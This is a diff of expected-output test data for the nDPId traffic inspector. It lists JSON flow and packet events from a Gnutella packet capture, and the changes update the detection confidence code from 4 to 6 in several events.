+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2199,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.197.97.94","src_port":28681,"dst_port":1360,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00532{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2200,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129210,"flow_last_seen":129210,"flow_idle_time":140000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":129210,"l3_proto":"ip4","src_ip":"84.197.97.94","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2200,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":129210,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":129210,"pkt":"CAAn5uVZUlQAEjUCCABFwACJBngAAH8BcgpUxWFeCgACDwMDv5kAAAAARQAAbbRuAAB\/EcTfCgACD1TFYV5wCQVQAFlEcRLCMQJWpAZdnm4V8nnpjnhEAAA6AAAABUdUS0cAACidCo0G3v\/IJjwziXwskXn9hKthBF0v4jVwCQEBAACHpNmcaMjLrgz72SMJ7seAsLgKkg=="} -00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2200,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129210,"flow_last_seen":129210,"flow_idle_time":140000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":129210,"l3_proto":"ip4","src_ip":"84.197.97.94","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.868061} +00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2200,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129210,"flow_last_seen":129210,"flow_idle_time":140000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":129210,"l3_proto":"ip4","src_ip":"84.197.97.94","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.868061} 01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2201,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":2,"flow_last_seen":129344,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":129344,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBnkAAEARwydM4lVpCgACDxjKcAkC3ybmeBkxArN0R\/zFhR7fMHiNqUQAAMACAAAGR1RLRwAAnpfHNvHWgDxrrvMwVMRjMd2z66QETOJVaRjKAQAAAAS4IqVOFEdUS0cAAIQFsf+Bv2njsZMOcK5XBzk5Qq3rBN3GzcRRKkdUS0cAAIPPdMtTw3ywAQrcKHskULaFt8T9BFd7NurTckdUS0cAAIBDDfCNVDqFgBWTNBe\/R1a2V7AXBLm7Sq3Q8UdUS0cAAI1c\/QX9I39S2eczHf8bGxQqBh3SBCaOd+rCRFdTSFIAAIsML3baZ9qjEzov01XuwUWPp8CvBBiB6TxOFldTSFIAAIgInuBYn2DWNYTpgSOhE3nGOSSqBGLQGpoTgldTSFIAAJMpLUy99S6l5+o3G\/7HZbY0zUPGBFnUW5sUS1NOT1cAAJJLJdecP9uDvZhuUeP7MwcedtuWBM8mo+QaeldTSFIAAJ7Bez1ZQQgPxovuLAykgS8CMrDdBLAKqQox\/0dUS0cAAJp\/6ofTpH0Z7c9sfONgy\/6jjg5ZBFTFYV4FUFdTSFIAAJgFqYyWS9v2Yq4KyYrmzTVJWc5SBGP6\/WMuK0dUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO0dUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAALSr6ArQaneMzMJ81PWuqjO12gqLBLV2NdR1LkdUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo40dUS0cAAL1cZVAaZZhJTOPlkpw6jfT8aYRtBD\/kr6kHkEdUS0cAALyzuhm5M4uYhLkABGRqZbdy38iOBGIjVe59rQ=="} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2202,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129345,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129345,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.250.253.99","src_port":28681,"dst_port":11819,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2202,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":129345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":129345,"pkt":"UlQAEjUCCAAn5uVZCABFAABtA3wAAIARyZcKAAIPY\/r9Y3AJLisAWcb1VskxAtkesLI2UdbrHnvJmEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2202,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129345,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129345,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.250.253.99","src_port":28681,"dst_port":11819,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2202,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129345,"flow_last_seen":129345,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129345,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"99.250.253.99","src_port":28681,"dst_port":11819,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":2,"flow_last_seen":129345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":129345,"pkt":"UlQAEjUCCAAn5uVZCABFAABtFDMAAIARzrIKAAIPZAHninAJ3O4AWa5oGAExAiz8sZobXXh7jKY+cEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":2,"flow_last_seen":129345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":129345,"pkt":"UlQAEjUCCAAn5uVZCABFAABtTdUAAIARVp8KAAIPVBw14XAJrzsAWRB8uXsxAsNFs8rL71MevwvUD0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":10750,"flow_last_seen":10750,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffa4:e108","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00636{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":9752,"flow_last_seen":17749,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00640{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":9752,"flow_last_seen":14765,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":10750,"flow_last_seen":10750,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":9752,"flow_last_seen":9752,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffa4:e108","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":9752,"flow_last_seen":17749,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":9752,"flow_last_seen":14765,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":130927,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2247,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":131668,"flow_last_seen":131668,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":131668,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"187.37.87.189","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2247,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":131668,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":131668,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FboAAIARBg4KAAIPuyVXvXAJGMoAIPd5R05EED8AAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2248,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":131668,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":131668,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0f68AAIAR17kKAAIPd+BfYXAJtRQAIJbPR05EED8BAQFUC1FLUlAGUk5BXS\/iNQlw"} @@ -1283,25 +1283,25 @@ 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2310,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":2,"flow_last_seen":134428,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":134428,"pkt":"UlQAEjUCCAAn5uVZCABFAABtAsMAAIAR5egKAAIP1eVv4HAJEwwAWfhP39IxAiTPawjpKg8FqMjKpUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2360,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.118.53.212","src_port":28681,"dst_port":29998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2360,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":139506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139506,"pkt":"UlQAEjUCCAAn5uVZCABFAABtAv8AAIARQCgKAAIPtXY11HAJdS4AWScUhfMxArbJ5SyHh4zpjzvfRkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2360,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.118.53.212","src_port":28681,"dst_port":29998,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2360,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.118.53.212","src_port":28681,"dst_port":29998,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2361,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"63.228.175.169","src_port":28681,"dst_port":1936,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2361,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":139506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139506,"pkt":"UlQAEjUCCAAn5uVZCABFAABtYr4AAIAR3CUKAAIPP+SvqXAJB5AAWZrqJBYxAlmizjMkdrKTCQRuaEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2361,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"63.228.175.169","src_port":28681,"dst_port":1936,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2361,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"63.228.175.169","src_port":28681,"dst_port":1936,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2362,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.35.85.238","src_port":28681,"dst_port":32173,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2362,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":139506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":139506,"pkt":"UlQAEjUCCAAn5uVZCABFAABtewQAAIAR+1sKAAIPYiNV7nAJfa0AWf9BqZoxAuJR0ARRd\/sw16p3JUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2362,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.35.85.238","src_port":28681,"dst_port":32173,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2362,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":139506,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.35.85.238","src_port":28681,"dst_port":32173,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":2,"flow_last_seen":139668,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":139668,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBs0AAEARedS1djXUCgACD3UucAkC3zh9hfMxArbJ5SyHh4zpjzvfRkQAAMACAAAGR1RLRwAAtKvoCtBqd4zMwnzU9a6qM7XaCosEtXY11HUuAQAAAARfhHP4FEdUS0cAAIQFsf+Bv2njsZMOcK5XBzk5Qq3rBN3GzcRRKkdUS0cAAIBDDfCNVDqFgBWTNBe\/R1a2V7AXBLm7Sq3Q8UdUS0cAAI1c\/QX9I39S2eczHf8bGxQqBh3SBCaOd+rCRFdTSFIAAIsML3baZ9qjEzov01XuwUWPp8CvBBiB6TxOFldTSFIAAIgInuBYn2DWNYTpgSOhE3nGOSSqBGLQGpoTgldTSFIAAJMpLUy99S6l5+o3G\/7HZbY0zUPGBFnUW5sUS1NOT1cAAJJLJdecP9uDvZhuUeP7MwcedtuWBM8mo+QaekdUS0cAAJ6Xxzbx1oA8a67zMFTEYzHds+ukBEziVWkYyldTSFIAAJ7Bez1ZQQgPxovuLAykgS8CMrDdBLAKqQox\/0dUS0cAAJp\/6ofTpH0Z7c9sfONgy\/6jjg5ZBFTFYV4FUFdTSFIAAJgFqYyWS9v2Yq4KyYrmzTVJWc5SBGP6\/WMuK0dUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO0dUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo40dUS0cAAL1cZVAaZZhJTOPlkpw6jfT8aYRtBD\/kr6kHkEdUS0cAALyzuhm5M4uYhLkABGRqZbdy38iOBGIjVe59rUdUS0cAALrtVGIh6HCMeHje7ytMi7+QCmj9BC\/grq4Yyg=="} 